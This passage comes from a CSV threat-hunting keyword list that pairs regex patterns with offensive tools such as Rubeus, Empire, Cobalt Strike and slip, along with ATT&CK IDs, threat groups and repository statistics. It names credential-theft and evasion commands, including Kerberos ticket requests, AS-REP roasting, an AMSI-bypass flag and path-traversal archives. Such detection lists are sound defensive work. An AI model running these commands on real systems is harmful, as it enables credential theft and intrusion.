Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","330","57","2024-04-03T11:48:50Z","2019-03-20T22:30:58Z" "* adhunt.py *",".{0,1000}\sadhunt\.py\s.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "* adm2sys.py*",".{0,1000}\sadm2sys\.py.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. 
This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","0","N/A","9","1","10","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" "* admin_persistence_winlogon.c*",".{0,1000}\sadmin_persistence_winlogon\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "* admin-panels.txt*",".{0,1000}\sadmin\-panels\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* AES_cryptor.py *",".{0,1000}\sAES_cryptor\.py\s.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "* afp-brute.nse*",".{0,1000}\safp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* afp-ls.nse*",".{0,1000}\safp\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* afp-path-vuln.nse*",".{0,1000}\safp\-path\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* afp-serverinfo.nse*",".{0,1000}\safp\-serverinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* afp-showmount.nse*",".{0,1000}\safp\-showmount\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -AgentDelay *",".{0,1000}\s\-AgentDelay\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -AgentJitter *",".{0,1000}\s\-AgentJitter\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* ajp-auth.nse*",".{0,1000}\sajp\-auth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ajp-brute.nse*",".{0,1000}\sajp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ajp-headers.nse*",".{0,1000}\sajp\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ajp-methods.nse*",".{0,1000}\sajp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ajp-request.nse*",".{0,1000}\sajp\-request\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Alcatraz.exe*",".{0,1000}\sAlcatraz\.exe.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","0","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "* All_attack.txt*",".{0,1000}\sAll_attack\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* allseeingeye-info.nse*",".{0,1000}\sallseeingeye\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* amqp-info.nse*",".{0,1000}\samqp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* amsi_disable *",".{0,1000}\samsi_disable\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "* --am-si-bypass=*",".{0,1000}\s\-\-am\-si\-bypass\=.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "* 
anti_analysis.exe*",".{0,1000}\santi_analysis\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* anti_debug.exe*",".{0,1000}\santi_debug\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* apc_injection.exe*",".{0,1000}\sapc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* api_hooking.exe*",".{0,1000}\sapi_hooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* --archive-type tar --mass-find * --mass-find-mode symlinks 
archive*",".{0,1000}\s\-\-archive\-type\star\s\-\-mass\-find\s.{0,1000}\s\-\-mass\-find\-mode\ssymlinks\sarchive.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","0","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "* --archive-type zip --symlinks ""../etc/hosts*linkname"" archive *",".{0,1000}\s\-\-archive\-type\szip\s\-\-symlinks\s\""\.\.\/etc\/hosts.{0,1000}linkname\""\sarchive\s\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","0","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "* --Args AntiVirus --XorKey*",".{0,1000}\s\-\-Args\sAntiVirus\s\-\-XorKey.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "* --args whoami*",".{0,1000}\s\-\-args\swhoami.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "* args_spoofing-rs.exe*",".{0,1000}\sargs_spoofing\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* arp.x64.o",".{0,1000}\sarp\.x64\.o","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","0","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "* arsenal-master.zip*",".{0,1000}\sarsenal\-master\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* Ask4Creds.ps1*",".{0,1000}\sAsk4Creds\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "* asktgs * /ticket:*",".{0,1000}\sasktgs\s.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* asktgs *.kirbi*",".{0,1000}\sasktgs\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* asktgs /ticket:*",".{0,1000}\sasktgs\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* asktgt * /service:*",".{0,1000}\sasktgt\s.{0,1000}\s\/service\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* asktgt /user *",".{0,1000}\sasktgt\s\/user\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* asktht /user:*",".{0,1000}\sasktht\s\/user\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* asm.py -t * -ln -w resources/*.txt -o *",".{0,1000}\sasm\.py\s\-t\s.{0,1000}\s\-ln\s\-w\sresources\/.{0,1000}\.txt\s\-o\s.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "* asn-query.nse*",".{0,1000}\sasn\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --asrep --domain * --user * --pass *",".{0,1000}\s\-\-asrep\s\-\-domain\s.{0,1000}\s\-\-user\s.{0,1000}\s\-\-pass\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "* asreproast *",".{0,1000}\sasreproast\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* --asreproast *",".{0,1000}\s\-\-asreproast\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* --asreproast *",".{0,1000}\s\-\-asreproast\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* --asreproast*",".{0,1000}\s\-\-asreproast.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* ASREProastables.txt*",".{0,1000}\sASREProastables\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --assemblyargs AntiVirus*",".{0,1000}\s\-\-assemblyargs\sAntiVirus.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 